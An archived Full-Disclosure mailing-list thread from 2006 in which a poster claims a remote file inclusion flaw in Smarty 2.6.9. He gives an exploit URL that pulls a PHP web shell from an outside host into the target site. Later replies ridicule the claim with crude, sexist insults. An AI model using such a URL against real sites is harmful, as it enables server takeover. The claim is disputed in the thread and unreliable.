Mailing List Archive: Vuln

Vuln

Oct 14, 2006, 9:25 AM

Post #1 of 5 (6584 views)

Hi I find a new vuln ...

the vuln :-

#########################################################

# Auother :- Sp1deR_NeT

# E-mail :- Sp1deR_Net@Hotmail.Com

# Site's :- WWW.Pal-HackinG.Com ++ WwW.Sp1deR-N3t.Com

# We Are :- Sp1deR_NeT , HACKERS PAL , MohajaLi .

#########################################################

Script :- Smarty-2.6.9

Exploit :- libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt?

Example :-
www.sitename.com/[path]/libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt?

Vuln Code :-
/**
* wrapper for include() retaining $this
* @return mixed
*/
function _include($filename, $once=false, $params=null)
{
if ($once) {
return include_once($filename);
} else {
return include($filename);
}
}
---------------------------------------------

Thx To :- nET^ViRus,Dr.HackeR,RunViruS,MaFiaBoy,Mr.Hcr,KabaRa,LeCoprA.

---------------------------------------------

WwW.Sp1deR-N3T.Com ///\\\///\\\

=============Sp1deR_Net@Hotmail.Com==============

!@!@!@!@!@!

_________________________________________________________________
Windows Live™ Messenger has arrived. Click here to download it for free!
http://imagine-msn.com/messenger/launch80/?locale=en-gb

Re: Vuln [ In reply to ]

upbupb at gmail

Oct 15, 2006, 5:40 AM

Post #2 of 5 (6346 views)

Permalink

are you fucking stupid or just retarded?

On 10/14/06, hitham hitham <sp1der_net@hotmail.com> wrote:
>
> Hi I find a new vuln ...
>
> the vuln :-
>
> #########################################################
>
> # Auother :- Sp1deR_NeT
>
> # E-mail :- Sp1deR_Net@Hotmail.Com
>
> # Site's :- WWW.Pal-HackinG.Com ++ WwW.Sp1deR-N3t.Com
>
> # We Are :- Sp1deR_NeT , HACKERS PAL , MohajaLi .
>
> #########################################################
>
> Script :- Smarty-2.6.9
>
> Exploit :- libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt?
>
> Example :-
>
> www.sitename.com/[path]/libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt
> ?
>
> Vuln Code :-
> /**
> * wrapper for include() retaining $this
> * @return mixed
> */
> function _include($filename, $once=false, $params=null)
> {
> if ($once) {
> return include_once($filename);
> } else {
> return include($filename);
> }
> }
> ---------------------------------------------
>
> Thx To :- nET^ViRus,Dr.HackeR,RunViruS,MaFiaBoy,Mr.Hcr,KabaRa,LeCoprA.
>
> ---------------------------------------------
>
> WwW.Sp1deR-N3T.Com ///\\\///\\\
>
> =============Sp1deR_Net@Hotmail.Com==============
>
> !@!@!@!@!@!
>
> _________________________________________________________________
> Windows Live™ Messenger has arrived. Click here to download it for free!
> http://imagine-msn.com/messenger/launch80/?locale=en-gb
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>

Re: Vuln [ In reply to ]

pinkhat.h4x0r at gmail

Oct 15, 2006, 12:19 PM

Post #3 of 5 (6348 views)

Permalink

I didn't know those were mutually exclusive. Thats like asking your
mom is she is a slut or a whore. Aren't they one and the same?

On 10/15/06, upb <upbupb@gmail.com> wrote:
>
> are you fucking stupid or just retarded?
>
>
> On 10/14/06, hitham hitham <sp1der_net@hotmail.com> wrote:
> >
> > Hi I find a new vuln ...
> >
> > the vuln :-
> >
> > #########################################################
> >
> > # Auother :- Sp1deR_NeT
> >
> > # E-mail :- Sp1deR_Net@Hotmail.Com
> >
> > # Site's :- WWW.Pal-HackinG.Com ++ WwW.Sp1deR-N3t.Com
> >
> > # We Are :- Sp1deR_NeT , HACKERS PAL , MohajaLi .
> >
> > #########################################################
> >
> > Script :- Smarty-2.6.9
> >
> > Exploit :- libs/Smarty.class.php?filename= www.soqor.net/tools/c99.txt?
> >
> > Example :-
> >
> www.sitename.com/[path]/libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt
> ?
> >
> > Vuln Code :-
> > /**
> > * wrapper for include() retaining $this
> > * @return mixed
> > */
> > function _include($filename, $once=false, $params=null)
> > {
> > if ($once) {
> > return include_once($filename);
> > } else {
> > return include($filename);
> > }
> > }
> > ---------------------------------------------
> >
> > Thx To :- nET^ViRus,Dr.HackeR,RunViruS,MaFiaBoy,Mr.Hcr,KabaRa,LeCoprA.
> >
> > ---------------------------------------------
> >
> > WwW.Sp1deR-N3T.Com ///\\\///\\\
> >
> > =============Sp1deR_Net@Hotmail.Com==============
> >
> > !@!@!@!@!@!
> >
> >
> _________________________________________________________________
> > Windows Live™ Messenger has arrived. Click here to download it for free!
> > http://imagine-msn.com/messenger/launch80/?locale=en-gb
> >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: Vuln [ In reply to ]

chris.kuethe at gmail

Oct 15, 2006, 1:20 PM

Post #4 of 5 (6340 views)

Permalink

On 10/15/06, Pink Hat <pinkhat.h4x0r@gmail.com> wrote:
> I didn't know those were mutually exclusive. Thats like asking your
> mom is she is a slut or a whore. Aren't they one and the same?

As I said to Pink Hat: "One's freeware, the other is payware."

The more I think about it, the more it's like software licensing:
- some encourage you to share
- some permit you to create derivative works
- some have viral licenses
- some licenses have severable clauses
- there's the whole issue of market penetration
- showing off the patent may cause you to pay for the product

There's more, but I'll leave them for someone else.

CK

--
GDB has a 'break' feature; why doesn't it have 'fix' too?

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: Vuln [ In reply to ]

daylasoul at hush

Oct 20, 2006, 1:12 AM

Post #5 of 5 (6325 views)

Permalink

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Sun, 15 Oct 2006 14:19:08 -0500 Pink Hat
<pinkhat.h4x0r@gmail.com> wrote:
>I didn't know those were mutually exclusive. Thats like asking
>your
>mom is she is a slut or a whore. Aren't they one and the same?
>
>On 10/15/06, upb <upbupb@gmail.com> wrote:
>>
>> are you fucking stupid or just retarded?
>>
>>
>> On 10/14/06, hitham hitham <sp1der_net@hotmail.com> wrote:
>> >
>> > Hi I find a new vuln ...
>> >
>> > the vuln :-
>> >
>> > #########################################################
>> >
>> > # Auother :- Sp1deR_NeT
>> >
>> > # E-mail :- Sp1deR_Net@Hotmail.Com
>> >
>> > # Site's :- WWW.Pal-HackinG.Com ++ WwW.Sp1deR-N3t.Com
>> >
>> > # We Are :- Sp1deR_NeT , HACKERS PAL , MohajaLi .
>> >
>> > #########################################################
>> >
>> > Script :- Smarty-2.6.9
>> >
>> > Exploit :- libs/Smarty.class.php?filename=
>www.soqor.net/tools/c99.txt?
>> >
>> > Example :-
>> >
>>
>www.sitename.com/[path]/libs/Smarty.class.php?filename=www.soqor.ne
>t/tools/c99.txt
>> ?
>> >
>> > Vuln Code :-
>> > /**
>> > * wrapper for include() retaining $this
>> > * @return mixed
>> > */
>> > function _include($filename, $once=false, $params=null)
>> > {
>> > if ($once) {
>> > return include_once($filename);
>> > } else {
>> > return include($filename);
>> > }
>> > }
>> > ---------------------------------------------
>> >
>> > Thx To :-
>nET^ViRus,Dr.HackeR,RunViruS,MaFiaBoy,Mr.Hcr,KabaRa,LeCoprA.
>> >
>> > ---------------------------------------------
>> >
>> > WwW.Sp1deR-N3T.Com ///\\\///\\\
>> >
>> > =============Sp1deR_Net@Hotmail.Com==============
>> >
>> > !@!@!@!@!@!
>> >
>> >
>>
>_________________________________________________________________
>> > Windows Liveâ„¢ Messenger has arrived. Click here to download it
>for free!
>> > http://imagine-msn.com/messenger/launch80/?locale=en-gb
>> >
>> >
>> >
>> > _______________________________________________
>> > Full-Disclosure - We believe in it.
>> > Charter:
>> http://lists.grok.org.uk/full-disclosure-charter.html
>> > Hosted and sponsored by Secunia - http://secunia.com/
>> >
>> >
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter:
>> http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/

Disagreements, flames, arguments, and off-topic discussion
should be taken off-list wherever possible.
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.5

wpwEAQECAAYFAkU4hOEACgkQ3AEcWsxdEQ7OMAP+OFcUTRO2LF0UVWl1YdKpTaMnrsTG
1ML9rZcc276Q9nzsVV3O4SPTd2KExuToLUp1YU16DxtmV5Nk7wbd4yqcOEa996bWWTq8
Kc/oK04GJgGoLX9BqGvXkuLXEjZFfTaZegbshjUUJjH/kGEYFdutIlHlkqtL2uNUjMW/
P69GcKk=
=F3kH
-----END PGP SIGNATURE-----

Concerned about your privacy? Instantly send FREE secure email, no account required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/